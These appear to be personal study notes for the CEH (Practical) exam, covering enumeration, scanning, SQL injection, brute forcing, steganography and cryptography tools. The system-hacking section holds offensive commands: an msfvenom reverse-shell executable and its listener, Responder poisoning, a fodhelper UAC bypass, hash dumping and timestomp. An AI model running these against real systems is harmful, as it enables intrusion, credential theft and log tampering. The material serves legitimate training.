## Enum4Linux

Enum4linux is **an enumeration tool capable of detecting and extracting data from Windows and Linux operating systems**, including those that are Samba (SMB) hosts on a network. Enum4linux is capable of discovering the following: Password policies on a target. The operating system of a remote target.

```
enum4linux -A 10.10.10.26
enum4linux -u guru -p cloudflare -n 10.10.10.x
enum4linux -u guru -p cloudflare -U 10.10.10.x
enum4linux -u guru -p cloudflare -o 10.10.10.x
enum4linux -u guru -p cloudflare -P 10.10.10.x
enum4linux -u guru -p cloudflare -G 10.10.10.x
enum4linux -u guru -p cloudflare -S 10.10.10.x

    • -U -> Enumerate the users on the share
    • -o -> Enumerate the Operating System of the share
    • -P -> Enumerate the password policy of the share
    • -G -> Enumerate the Group policy of the share
    • -S -> Enumerate the Shared policy of the share
     
```


# Vulnerability Analysis

Welcome to the Vulnerability Analysis module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

A vulnerability assessment is a systematic review of security weaknesses in an information system. It evaluates if the system is susceptible to any known vulnerabilities, assigns severity levels to those vulnerabilities, and recommends remediation or mitigation, if and whenever needed.

Examples of threats that can be prevented by vulnerability assessment include:

1. SQL injection, XSS, and other code injection attacks.
2. Escalation of privileges due to faulty authentication mechanisms.
3. Insecure defaults: software that ships with insecure settings, such as a guessable admin password.

## List of Vulnerability Analysis and Assessment Tools

### OpenVAS

OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthenticated and authenticated testing, various high-level and low-level internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test. The scanner obtains the tests for detecting vulnerabilities from a feed that has a long history and daily updates.

{% embed url="<https://www.openvas.org>" %}

### Nessus

Nessus is **a network security scanner**. It utilizes plug-ins, which are separate files, to handle the vulnerability checks. This makes it easy to install plug-ins and to see which plug-ins are installed to make sure that you are current. Nessus uses a server-client architecture.

{% embed url="<https://www.tenable.com/products/nessus>" %}

### GFI LanGuard

GFI LanGuard allows **you to scan, detect, assess and rectify security vulnerabilities in your network** and secure it with minimal administrative effort. It gives you a complete picture of your network setup, which helps you maintain a secure network faster and more effectively.

{% embed url="<https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard>" %}

### Nikto

Nikto is an Open Source ([GPL](http://www.gnu.org/licenses/licenses.html#GPL)) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

{% embed url="<https://www.kali.org/tools/nikto>" %}

#### Example usage of Nikto

```
nikto -h www.google.com -Tuning x
nikto -h www.google.com -Cgidirs all
nikto -h www.google.com -o nikto_scan_results -F txt
```


# System Hacking

Welcome to the System Hacking module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

System hacking is defined as the **compromise between computer systems and software to access the target computer and steal or misuse its sensitive information**. The malware and the attacker identify and exploit the vulnerability of the computer system to gain unauthorized access.

#### Steps involved in System Hacking

1. Gaining Access
2. Escalation Privileges
3. Maintaining Access
4. Clearing Logs

## NTLM

Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users' identities and protect the integrity and confidentiality of their activity.

{% embed url="<https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4>" %}
This Medium Post might give you an idea about NTLM Hashes
{% endembed %}

### Responder

Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: <http://support.microsoft.com/kb/163409>). By default, the tool will only respond to File Server Service requests, which are for SMB.

The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behaviour. You can set the -r option via the command line if you want to answer the Workstation Service request for a name suffix.

{% embed url="<https://github.com/SpiderLabs/Responder>" %}

{% embed url="<https://medium.com/mii-cybersec/gaining-credentials-easily-with-responder-tool-b821f33e342b>" %}
This migh be useful! Give a read
{% endembed %}

```
chmod +x Responder.py
sudo ./Responder.py -I eth0
Responder.py -I eth0 -dwrv
```

### Cracking NTLM Hash using John-The-Ripper

John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems. It has a bunch of passwords in both raw and hashed format. Now to crack the password, John the Ripper **will identify all potential passwords in** a hashed format.

{% embed url="<https://github.com/openwall/john>" %}

{% file src="/files/zXYY6k2pseXdH6AwFKCm" %}
<https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf>
{% endfile %}

{% embed url="<https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats>" %}

## Backdoor Using Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

#### Crafting Windows executable through MSFVenom

```
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe
```

#### Setting up reverse listener using msfconsole

```
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR-IP-ADDRESS
ser RPORT ANY-FREE-PORT
exploit
```

## PowerSploit

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

{% embed url="<https://github.com/PowerShellMafia/PowerSploit>" %}

#### Must Read this tutorial&#x20;

{% embed url="<https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-powersploit-part-1-evading-antivirus-software-0165535>" %}

## Armitage

*Armitage* is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.

![](https://146382273-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTnYLydS0JgZzHeOY4n38%2Fuploads%2Fsymgb6cvomFj9c3RD1L4%2FArmitage_5_shells.png?alt=media\&token=09e653ec-f10d-41da-9499-a3858812b007)

## Hacking Microsoft office with Macro

{% embed url="<https://www.yeahhub.com/exploit-windows-malicious-ms-office-file-metasploit-framework>" %}

## Privesc Windows Machine using BeRoot

BeRoot Project is a post-exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the [pupy](https://github.com/n1nj4sec/pupy/) project as a post-exploitation module (so it will be executed in memory without touching the disk). This tool does not realize any exploitation. Its main goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only information that has been found as a potential way to escalate our privilege.

{% embed url="<https://github.com/AlessandroZ/BeRoot>" %}

#### Steps you can replicate

1. Upload the BeRoot.exe into the Machine through Reverse Shell
2. Interact to the win shell.
3. BeRoot.exe
4. Run post/windows/gather/smart\_hashdump
5. to get System prev to try to use "getsystem -t 1" If it responds negative then follow the next step
6. Let's try another exploit. "use exploit/windows/local/bypassuac\_fodhelper" and set the session into that exploit.
7. After exploit try to run "getuid" "getsystem -t 1" "getuid"
8. Run post/windows/gather/smart\_hashdump

#### Other Methodology:

{% embed url="<https://medium.com/@tommelo/bypassing-windows-10-uac-with-python-aed3c835c4f0>" %}

{% embed url="<https://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key>" %}


# Steganography

Welcome to the Steganography module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

Steganography is the practice of concealing a message within another message or a physical object. In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video.

## Timestomp

Timestomp is a **utility co-authored** by developers James C. Foster and Vincent Liu. The software's goal is to allow for the deletion or modification of timestamp-related information in files. The "Timestomp MACE Change Proof" screenshot is a final shot of the operating system's interpretation of the modified timestamp.

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/timestomp>" %}

```
timestomp seceret.txt. -m "02/11/2021 08:06:04"
    • -m → Modify Values
    • -a → Accessed
    • -c → Created
```

## Hiding Files using New Technology File System(NTFS) Streams

{% embed url="<https://www.howtogeek.com/howto/windows-vista/stupid-geek-tricks-hide-data-in-a-secret-text-file-compartment>" %}

## Snow

Snow is a free steganography tool to hide messages in text using white spaces. It takes a file from you and then hides the specified message after encrypting it using a password that you specify. You can hide any message in any text file and then simply retrieve it in an easy way. After hiding sensitive information in a text file, you can send that to any user via email or file-sharing services and then don’t worry about if someone steals the information as the message is encrypted.

#### Encryption

```
snow -C -m "Secret Text Goes Here!" -p "magic" readme.txt readme2.txt
    • -m → Set your message
    • -p → Set your password
```

#### Decryption

```
./snow -C -p "magic" output.txt
```

{% embed url="<https://www.ilovefreesoftware.com/01/windows/free-steganography-tool-to-hide-message-in-text-using-white-spaces.html>" %}

## OpenStego

OpenStego provides two main functionalities:

* **Data Hiding:** It can hide any data within a cover file (e.g. images).
* **Watermarking (beta):** Watermarking files (e.g. images) with an invisible signature. It can be used to detect unauthorized file copying.

{% embed url="<https://www.openstego.com>" %}


# Sniffing

Welcome to the Sniffing module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

Packet sniffing is the practice of gathering, collecting, and logging some or all packets that pass thru a computer network, regardless of how the packet is addressed. In this way, every packet, or a defined subset of packets, may be gathered for further analysis. You, as a network administrator, can use the collected data for a wide variety of purposes, like monitoring bandwidth and traffic.

A packet sniffer, sometimes called a packet analyzer, is composed of two main parts. First, a network adapter that connects the sniffer to the existing network. Second, software that provides a way to log, see, or analyze the data collected by the device.

## WireShark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named "Ethereal," the project was renamed "Wireshark" in May 2006 due to trademark issues.

{% hint style="success" %}
I can't stress how much you need to learn Wireshark. Since this wireshark is very important from an exam point of view. So, please learn. You can Google stuff online. There are tons of video tutorials for Wireshark.
{% endhint %}

* [ ] How to analyze the packets
* [ ] Learn to analyze the list of IPs that had DDos attacks.
* [ ] Learn to find sensitive data in the HTTP flow.


# SQL Injection

Welcome to the SQL Injection module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

SQL injection, also known as SQLI, is **a common attack vector** that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists, or private customer details.

> **What is SQL?**
>
> SQL stands for **Structured Query Language**, which is a computer language for storing, manipulating, and retrieving data stored in a relational database. SQL is the standard language for Relational Database System. MS SQL Server uses T-SQL, Oracle uses PL/SQL, the MS Access version of SQL is called JET SQL (native format), etc.

## Basics

* You can learn SQL Injection basics from the given link below.

{% embed url="<https://www.w3schools.com/sql/sql_injection.asp>" %}

{% embed url="<https://portswigger.net/web-security/sql-injection>" %}

## SQL Injection Cheat Sheet

{% embed url="<https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet>" %}

## SQLMap

* sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
* It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

{% embed url="<https://github.com/sqlmapproject/sqlmap>" %}
GitHub Repo of SQLMap
{% endembed %}

#### After gaining knowledge of SQLMap, you should need to know:

* [ ] Enumeration of databases
* [ ] Enumeration of Tables in a Database
* [ ] Dump the data from the database
* [ ] Spawning an OS Shell with SQLMap

## Damn Small SQLi Scanner

**Damn Small SQLi Scanner** (DSSS) is a fully functional [SQL injection](https://en.wikipedia.org/wiki/SQL_injection) vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.

{% embed url="<https://github.com/stamparm/DSSS>" %}


# Hacking Web Applications & Servers

Welcome to the Hacking Web Applications & Servers module. This note will guide you thru all the methodologies I followed while preparing for CEH (Practical) exam.

## Identify Technology (Footprint)

* Identifying the technology that is used by the web application would give us an idea on how to exploit that particular application.

#### List of tools used to identify the technology

1. httprecon
2. [wappalyzer](https://www.wappalyzer.com/)
3. whatweb (CLI)

### Other Methods

* Using Telnet
* Using NetCat

### Nmap Scripts

#### Normal HTTP Enumeration

```
nmap -sV --script=http-enum www.xyz.com
```

#### WAF Detection

```
nmap -p 80,443 --script=http-waf-detect www.xyz.com 
```

## Directory Bruteforce

Brute force directory guessing attacks are very common attacks used against websites and web servers. They are **used to finding hidden and often forgotten directories on a site to try to compromise**.

{% embed url="<https://www.youtube.com/watch?v=9Hik0xy9qd0>" %}
Check out [Alexis Ahmed's](https://ke.linkedin.com/in/alexisahmed) video on Fuzzing and Directory Brute-Force. This can gives you an idea.
{% endembed %}

### Dirbuster for Directory Brute force

DirBuster is a multi-threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

However, tools of this nature are often only good as the directory and file list they come with. A different approach was taken to generate this. The list was generated from scratch, by crawling the Internet and enough, the directory and files that are actually used by developers! DirBuster comes with a total of 9 different lists, this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide.

{% embed url="<https://www.kali.org/tools/dirbuster>" %}

#### CheatSheets for Dirbuster

{% embed url="<https://null-byte.wonderhowto.com/how-to/hack-like-pro-find-directories-websites-using-dirbuster-0157593>" %}

{% hint style="info" %}
You can use any directory brute force tools eg: GoBuster, Dirsearch, BruteX, etc... But make your mind that every tool makes the same process. So, master one tool and you are good to go.&#x20;
{% endhint %}

## Service Bruteforce

### Hydra

Man! I can't say words about this tool!🔥This is one of my fav tools for brute force passwords for services running on a network.

```
hydra -L /Path/To/Username/WordList -P /Path/To/Password/WordList 10.10.10.x ftp
```

On Hydra, you can set your desired service to brute force, on the above command you can see I have set the brute force to FTP. Same as you can set for any service. Examples, SSH, RDP, SAMBA, etc...  &#x20;

### Medusa

Medusa is also one of the best tools out there for brute force. Even though I love Hydra, I use medusa alot. Maybe I can prioritize Medusa first and Hydra second place.&#x20;

{% embed url="<https://shehackske.medium.com/brute-force-password-cracking-with-medusa-b680b4f33d69>" %}
This Medium has a comprehensive explanation on how tpo use medusa
{% endembed %}

```
medusa -h 10.10.10.x -U /root/Documents/user_list.txt -p /root/Documents/pass_list.txt -M ftp -F
```

## DVWA

**Damn Vulnerable Web Application (DVWA)** is a PHP/MySQL web application that is damn vulnerable. DVWA aims to practice some of the most common web vulnerabilities, with various levels of difficulty. DVWA plays one of the major roles in the C|EH (Practical) exam. It is advisable to crack DVWA and get used to the box since the challenges may appear based on the challenges available on this box.

{% hint style="warning" %}
Hey! Thank you for being up here in my process. DVWA is one of the best applications for practising your web application attacks. Since I completed this challenge years before, I request you to work on this. I can't help you with each module in the DVWA but there are tons of video tutorials and blogs about this box. Please complete this box since this might be <mark style="color:red;">**important**</mark> for your exam.
{% endhint %}

#### I have attached the solution Playlist of DVWA below 👇🏻 check this out

<https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q>

{% embed url="<https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q>" %}
<https://www.youtube.com/playlist?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q>
{% endembed %}

#### By now, you should have the knowledge on:

> * [ ] Command Injection
> * [ ] Local File Inclusion (LFI)
> * [ ] Crafting Payload using msfvenom
> * [ ] Gaining Reverse shell using netcat or metasploit
> * [ ] SQL Injection
> * [ ] XSS
> * [ ] CSRF
> * [ ] Bruteforce

## Wordlist

{% hint style="success" %}
For **Certified Ethical Hacker (Practical)** exam, You don't need to worry about the wordlist since most probably they would have attached the wordlist for each module so make use of those first. If you have any failures then go with the default wordlist.
{% endhint %}


# Cloud Computing

Welcome to the Cloud Computing module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

Cloud computing is the on-demand availability of computer system resources, especially data storage and computing power, without direct active management by the user. Large clouds often have functions distributed over multiple locations, each location being a data centre.

### Tools for Enumeration

1. Lazys3
2. S3Scanner

## Amazon Web services

{% embed url="<https://www.youtube.com/watch?v=ITSZ8743MUk>" %}

{% embed url="<https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3>" %}
This Book has all details about AWS Vuln
{% endembed %}


# Cryptography

Welcome to the Cryptography module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

## Introduction

Cryptography is the science of protecting information by transforming it into a secure format. This process, called encryption, has been used for centuries to prevent handwritten messages from being read by unintended recipients. Today, cryptography is used to protect digital data. It is a division of computer science that focuses on transforming data into formats that cannot be recognized by unauthorized users.&#x20;

An example of basic cryptography is an encrypted message in which letters are replaced with other characters. To decode the encrypted contents, you would need a grid or table that defines how the letters are transposed.&#x20;

For example, the translation grid below could be used to decode <mark style="color:orange;">**"aHR0cHM6Ly90aGVndXJ1c2VjLmNvbS8"**</mark> **as&#x20;**<mark style="color:purple;">**"**</mark>[<mark style="color:purple;">**https://thegurusec.com**</mark>](https://thegurusec.com)<mark style="color:purple;">**"**</mark>.

## Tools

### Calculate One-way Hashes using HashClac

* You may use this tool to calculate the **MD5 hashes**

{% embed url="<https://www.slavasoft.com/hashcalc>" %}

### Calculate MD5 Hashes using MD5 Calculator

* Use this tool to compare the hashes with other hashes

{% embed url="<http://www.md5calculator.com>" %}

### Calculate MD5 hashes for files using HashMyFiles

HashMyFiles is a small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system.

{% embed url="<https://www.nirsoft.net/utils/hash_my_files.html>" %}

## Perform File and Text Message Encryption using CryptoForge

{% embed url="<https://www.cryptoforge.com>" %}

### Perform File Encryption using Advanced Encryption Package

{% embed url="<http://www.aeppro.com>" %}

### Encrypt and Decrypt messages using BCText Encoder

{% embed url="<https://www.jetico.com/free-security-tools/encrypt-text-bctextencoder>" %}

### Perform Disk Encryption Using VeraCrypt

VeraCrypt is an open-source utility for on-the-fly encryption. The software can create a virtual encrypted disk that works just like a regular disk but within a file. It can also encrypt a partition or the entire storage device with pre-boot authentication. VeraCrypt is a fork of the discontinued TrueCrypt project

* **Creating an encrypted VeraCrypt volume File**

  * Open the application and click “Create Volume”.
  * tap on “Create an Encrypted File Container”.
  * Select a path where the volume has to be saved.
  * Now, mention the volume size.
  * Set a password for the encrypted volume file.
  * For file system format we can set as “FAT“ and cluster as “Default”.

* **Mounting the Encrypted file into a Volume**

  * Select any volume of your choice.
  * Select the VeraCrypt volume created before to be added.
  * Select Mount and it may prompt for a password.

* **Uploading Files into VeraCrypt Virtual Encrypted Volume**

  * Create/Copy/Move the files into the Volume which you choose for mounting.
  * Paste all your confidential files inside that virtual volume.
  * Once completed, open the VeraCrypt application and then press “Dismount”.

{% embed url="<https://www.veracrypt.fr/en/Home.html>" %}

### Bitlocker

BitLocker Drive Encryption is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned computers.

BitLocker provides the most protection when used with a Trusted Platform Module (TPM) version 1.2 or later. The TPM is a hardware component installed in many newer computers by the computer manufacturers. It works with BitLocker to help protect user data and to ensure that a computer has not been tampered with while the system was offline.

{% embed url="<https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview>" %}
Official Link of Microsoft
{% endembed %}

### Rohos Disk Encryption

{% embed url="<https://www.rohos.com/products/rohos-disk-encryption>" %}

### Cryptool

CrypTool is an open-source project that is a free e-learning software for illustrating cryptographic and cryptanalytic concepts. According to "Hakin9", CrypTool is worldwide the most widespread e-learning software in the field of cryptology. CrypTool implements more than **400 algorithms.**

{% embed url="<https://www.cryptool.org/en>" %}

{% hint style="success" %}
I strongly recommend you learn all these tools. At least Go through the tools.&#x20;
{% endhint %}


# The Final Note

Finally, for the Final Note. This note would have been guided you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

### Hey! Thank you for reading my notes. I hope this will be your only source of side support throughout your CEH (Practical) preparation. I strongly suggest you take your own notes so that you can personalize them.

{% hint style="danger" %}
Disclaimer: These notes are only for your personal preparation. I did it for mine, and I thought it might help others too. You can share this note anywhere, but if any issue arises, I'm not responsible for it. Also, some of the tools I've mentioned in the notes are not updated, handle them with your own response.
{% endhint %}

## Support Me

#### Hi Again! So I put much effort into writing Certified Ethical Hacker (Practical) Notes since they are not going to pay me, but if I get a few treats, I'd be more grateful to myself since I can use them for my hosting and server maintenance. 😁😍💝

{% embed url="<https://www.buymeacoffee.com/guruhariharaun>" %}
Buy me a coffee here 😍😁
{% endembed %}

## I Need your Feedback

#### At the bottom of the pages, you can find emojis. Please do rate it based on your preferences. It might help me to stay motivated as well. 😊


